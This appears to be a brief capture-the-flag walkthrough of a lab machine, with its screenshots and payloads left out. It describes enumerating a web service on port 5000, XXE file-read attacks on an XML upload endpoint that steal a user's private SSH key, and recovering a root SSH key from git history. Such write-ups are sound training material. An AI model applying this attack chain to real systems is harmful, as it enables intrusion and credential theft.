Nmap scan:
There's only one port open on this machine.
On port 5000, this is what we see:
We can use gobuster
on this to find more directories.
/feed
would bring us here:
XML Injection is pretty helpful, and i noticed that when we upload a file using this API, a POST request would be sent to the /upload
directory with HTTP form data.
However, trying to send any XML files that I created results in a Internal Server Error message being returned. Turns out, there are specific elements that we need to use for this endpoint:
With these, we can wrap them in another tag and start getting successful uploads through.
From this, we identified that we have a user called roosa
. Then, we can attempt some basic XXE LFI payloads to read the user's private SSH key.
Afterwards, we can simply SSH into the machine.
When checking the id
of this user, we see that we are part of the sudo
group.
Within the home directory of the user, we also find some Git repository files.
Using find /home -name .git
, we can find the specific location of the Git repository to read its logs.
After heading to that directory, we would find an SSH key after using git log -p -2
:
Surprisingly, this was the root SSH key.